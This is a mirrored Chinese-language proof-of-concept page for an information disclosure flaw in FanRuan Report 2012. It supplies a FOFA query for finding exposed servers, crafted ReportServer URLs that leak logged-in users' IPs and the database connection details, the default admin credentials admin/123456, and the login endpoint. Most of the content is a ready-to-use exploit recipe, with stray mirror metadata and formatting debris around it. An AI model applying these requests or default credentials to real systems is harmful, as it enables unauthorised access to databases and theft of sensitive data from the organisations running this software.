mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
47 lines
827 B
Markdown
47 lines
827 B
Markdown
# 帆软报表 2012 信息泄露漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
帆软报表 2012
|
||
```
|
||
|
||
## FOFA
|
||
|
||
```
|
||
body="down.download?FM_SYS_ID"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
获取登录报表系统的IP
|
||
|
||
```plain
|
||
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
|
||
```
|
||
|
||
|
||
|
||

|
||
|
||
|
||
|
||
数据库信息泄露
|
||
|
||
```plain
|
||
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
|
||
```
|
||
|
||
|
||
|
||

|
||
|
||
后台默认口令 admin/123456
|
||
|
||
```plain
|
||
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()
|
||
``` |